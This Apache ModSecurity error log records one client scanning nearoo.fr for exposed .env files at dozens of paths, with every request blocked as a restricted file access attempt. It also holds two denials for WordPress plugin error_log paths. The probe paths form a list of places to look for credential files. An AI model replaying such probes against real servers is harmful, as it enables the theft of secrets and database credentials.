[Mon May 11 16:54:15.370660 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agHtl4W8yzYoWG_eyCWh9QAAAVI"]
[Mon May 11 16:54:15.370885 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agHtl4W8yzYoWG_eyCWh9QAAAVI"]
[Mon May 11 16:54:15.505200 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh9gAAAVI"]
[Mon May 11 16:54:15.505396 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh9gAAAVI"]
[Mon May 11 16:54:15.505605 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/app/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh9gAAAVI"]
[Mon May 11 16:54:15.741005 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-AAAAVI"]
[Mon May 11 16:54:15.741250 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-AAAAVI"]
[Mon May 11 16:54:15.741497 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/apps/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-AAAAVI"]
[Mon May 11 16:54:15.913571 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-gAAAVI"]
[Mon May 11 16:54:15.913784 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-gAAAVI"]
[Mon May 11 16:54:15.914013 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/api/.env"] [unique_id "agHtl4W8yzYoWG_eyCWh-gAAAVI"]
[Mon May 11 16:54:16.035751 2026] [authz_core:error] [pid 1411055:tid 1411065] [client 75.119.155.172:5154] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/error_log
[Mon May 11 16:54:16.138559 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh-wAAAVI"]
[Mon May 11 16:54:16.138782 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh-wAAAVI"]
[Mon May 11 16:54:16.139012 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/web/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh-wAAAVI"]
[Mon May 11 16:54:16.372539 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_QAAAVI"]
[Mon May 11 16:54:16.372766 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_QAAAVI"]
[Mon May 11 16:54:16.373002 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/site/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_QAAAVI"]
[Mon May 11 16:54:16.573641 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_wAAAVI"]
[Mon May 11 16:54:16.573857 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_wAAAVI"]
[Mon May 11 16:54:16.574101 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/public/.env"] [unique_id "agHtmIW8yzYoWG_eyCWh_wAAAVI"]
[Mon May 11 16:54:16.728068 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAAAAAVI"]
[Mon May 11 16:54:16.728317 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAAAAAVI"]
[Mon May 11 16:54:16.728559 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/admin/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAAAAAVI"]
[Mon May 11 16:54:16.958207 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAgAAAVI"]
[Mon May 11 16:54:16.958422 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAgAAAVI"]
[Mon May 11 16:54:16.958673 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agHtmIW8yzYoWG_eyCWiAgAAAVI"]
[Mon May 11 16:54:17.097424 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBAAAAVI"]
[Mon May 11 16:54:17.097630 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBAAAAVI"]
[Mon May 11 16:54:17.097846 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBAAAAVI"]
[Mon May 11 16:54:17.282445 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBQAAAVI"]
[Mon May 11 16:54:17.282665 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBQAAAVI"]
[Mon May 11 16:54:17.282903 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBQAAAVI"]
[Mon May 11 16:54:17.520475 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBwAAAVI"]
[Mon May 11 16:54:17.520690 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBwAAAVI"]
[Mon May 11 16:54:17.520938 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiBwAAAVI"]
[Mon May 11 16:54:17.552330 2026] [authz_core:error] [pid 1411201:tid 1411259] [client 75.119.155.172:2196] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/error_log
[Mon May 11 16:54:17.892474 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiCQAAAVI"]
[Mon May 11 16:54:17.892696 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiCQAAAVI"]
[Mon May 11 16:54:17.892950 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agHtmYW8yzYoWG_eyCWiCQAAAVI"]
[Mon May 11 16:54:18.161250 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agHtmoW8yzYoWG_eyCWiCwAAAVI"]
